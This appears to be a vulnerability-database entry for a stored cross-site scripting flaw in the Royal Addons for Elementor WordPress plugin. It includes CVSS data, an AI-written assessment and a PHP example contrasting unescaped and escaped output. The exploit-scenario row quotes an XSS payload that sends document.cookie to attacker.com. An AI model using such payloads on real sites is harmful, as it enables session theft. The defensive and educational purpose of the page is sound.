Severity by source
AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
Primary rating from NVD · only source for this CVE.
CVSS Vector (NVD)
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
Lifecycle Timeline
Description (CVE.org)
The Royal Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Instagram Feed widget's 'instagram_follow_text' setting in all versions up to, and including, 1.7.1056 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
Analysis (AI)
Stored Cross-Site Scripting in Royal Addons for Elementor plugin versions up to 1.7.1056 allows authenticated attackers with Contributor-level access to inject arbitrary JavaScript via the Instagram Feed widget's 'instagram_follow_text' setting, executing malicious scripts whenever users view affected pages. The vulnerability stems from insufficient input sanitization and output escaping in the widget configuration handler. …
Attack Chain (AI-derived)
Hypothetical attack flow derived from CVE metadata
Vulnerability Assessment (AI)
| Section | Assessment |
| --- | --- |
| Exploitation | Exploitation requires three conditions: (1) the Royal Addons for Elementor plugin must be installed and activated on the WordPress site, (2) the attacker must possess or compromise a WordPress user account with at least the Contributor role (Contributor, Editor, or Administrator), which grants permission to edit pages and access the Elementor page builder widget editor, and (3) a page or post must contain the Instagram Feed widget with the 'instagram_follow_text' setting rendered on the front end (not in draft or trash). … Additional conditions and limiting factors are described in the full assessment. |
| Risk Assessment | The risk is moderate to moderately high within WordPress environments running the plugin, but context-dependent. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in. |
| Exploit Scenario | An attacker with a compromised Contributor account (or granted legitimate Contributor access via social engineering) logs into the WordPress admin, navigates to a page using the Instagram Feed widget, and edits the widget settings to inject malicious JavaScript into the 'instagram_follow_text' field (e.g., '<img src=x onerror="fetch(attacker.com?c='+document.cookie+')">Follow'). The payload is saved to the database without sanitization. … |
| Remediation | Update Royal Addons for Elementor to the patched version released after 1.7.1056 (consult the WordPress plugin repository for the latest stable version, or monitor the Wordfence advisory at https://www.wordfence.com/threat-intel/vulnerabilities/id/16d083bc-d726-4291-bc6d-a7bf83fa78c3 for the specific fix version). … Detailed patch versions, workarounds, and compensating controls in full report. |
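The root cause named above is the combination of no sanitization when the setting is saved and no escaping when it is rendered. The following PHP is an added illustration, not the plugin's own code: the function names, the settings array shape and the shims are hypothetical, and a real plugin would rely on WordPress's `sanitize_text_field()` and `esc_html()` rather than the fallbacks that let this file run outside WordPress.

```php
<?php
// Added illustration (not Royal Addons code) of handling a free-text widget
// setting such as 'instagram_follow_text'. Assumes a WordPress runtime; the
// shims below exist only so the file also runs stand-alone with plain PHP.
if (!function_exists('sanitize_text_field')) {
    function sanitize_text_field($s) { return trim(strip_tags((string) $s)); }
}
if (!function_exists('esc_html')) {
    function esc_html($s) { return htmlspecialchars((string) $s, ENT_QUOTES, 'UTF-8'); }
}

// Vulnerable pattern: the stored setting is concatenated straight into markup.
function render_follow_button_vulnerable(array $settings): string {
    $text = $settings['instagram_follow_text'] ?? 'Follow';
    return '<a class="follow">' . $text . '</a>';
}

// Hardened pattern: sanitize on save AND escape at the output sink. Escaping at
// the sink is the control that actually stops the injected markup from
// reaching the browser; sanitizing on save is defence in depth.
function save_follow_text(string $raw): string {
    return sanitize_text_field($raw);
}
function render_follow_button_safe(array $settings): string {
    $text = $settings['instagram_follow_text'] ?? 'Follow';
    return '<a class="follow">' . esc_html($text) . '</a>';
}

// Constructed sample value of the kind a Contributor-level user could submit.
$constructed   = '<img src=x onerror="alert(1)">Follow';
$settings_raw  = ['instagram_follow_text' => $constructed];
$settings_safe = ['instagram_follow_text' => save_follow_text($constructed)];

echo render_follow_button_vulnerable($settings_raw) . PHP_EOL; // tag reaches the page intact
echo render_follow_button_safe($settings_raw) . PHP_EOL;       // rendered as literal text
echo render_follow_button_safe($settings_safe) . PHP_EOL;      // '<a class="follow">Follow</a>'
```

Run with `php example.php`; the first line shows the raw `<img>` tag in the output, while the second shows it entity-encoded so the browser displays it as text rather than executing the handler.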
EUVD-2026-23340